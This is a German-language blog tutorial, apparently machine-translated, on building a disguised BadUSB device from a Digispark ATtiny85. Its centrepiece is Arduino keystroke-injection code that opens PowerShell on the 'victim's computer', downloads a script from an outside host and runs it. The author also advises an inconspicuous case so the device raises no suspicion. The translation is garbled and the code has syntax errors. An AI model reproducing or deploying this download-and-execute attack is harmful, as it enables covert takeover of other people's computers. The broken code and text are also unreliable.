Programmierbarer "USB-Stick" oder wie man einen Computer schnell übernimmt

Heute ist ein Eintrag eine Form von Tutorial, wie man zu niedrigen Kosten erstellen Sie Ihren eigenen programmierbaren USB-Stick nach dem Vorbild der teuren und beliebten Rubber Ducky von Hak5. Es funktioniert auf einer Tastaturbasis – an den Computer angeschlossen, gibt es eine vorprogrammierte Tastenfolge ein. Der erste Schritt ist der Kauf einer Miniatur-Arduino-Platte auf Basis des Mikrocontrollers ATtiny85 – Digispark. Am meisten können Sie es bei unseren Freunden aus China auf einer der beliebten Auktionsseiten finden. Die Preise beginnen dort bereits bei 1 $ –Digispark ATtiny85 - Digispark Da ich manchmal ein Problem mit der Erkennung von DigiSparka durch einige Computer (insbesondere USB3-Anschlüsse) habe, ist es am besten, sofort einen Adapter zu lagern, das löst dieses Problem (Kosten ca. 2 $) –Adapter USB-Adapter Wenn die bestellte Hardware zu uns kommt, brauchen wir für seine Umgebungsprogrammierung, die Adruino IDE sein wird –Arduino Tutorial Anschluss an sie Digisparka können wir hier finden –Schema Unser Controller hat eine begrenzte Menge an Speicher, so dass die richtige Payload möglicherweise nicht darauf passen. Ich habe dieses Problem umgangen, indem ich Code darauf platziert habe, der ein Powershella-Skript mit Payload abruft, das wiederum später auf dem Computer des Opfers ausgeführt wird:

#include "DigiKeyboard.h" void setup()

void loop() – DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); DigiKeyboard.delay(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke KEY_ENTER); DigiKeyboard.delay(1000); DigiKeyboard.print("$client = new-object System.Net.WebClient"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(500); DigiKeyboard.print("$client. DownloadFile("https://my127001.pl/script.ps1" , "script.ps1")"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(2000); DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT | KEY_R); DigiKeyboard.delay(750); DigiKeyboard.print("powershell.exe -File script.ps1"); DigiKeyboard.sendKeyStroke(KEY_ENTER); for (;;) /*empty*/

}

Um das Aussehen unseres Pendriva weiter zu beherrschn, damit es keinen Verdacht weckt, sollten Sie sich mit einem gedruckten Gehäuse eindecken, z.B. mit einem Design unter dem Link –Das Ganze Gehäuse präsentiert sich wie folgt und kann die Kontrolle über den Computer des Opfers in Sekundenschnelle übernehmen: Programmierbarer "USB-Stick"

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Speichere in deinen Favoriten diesen permalink.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert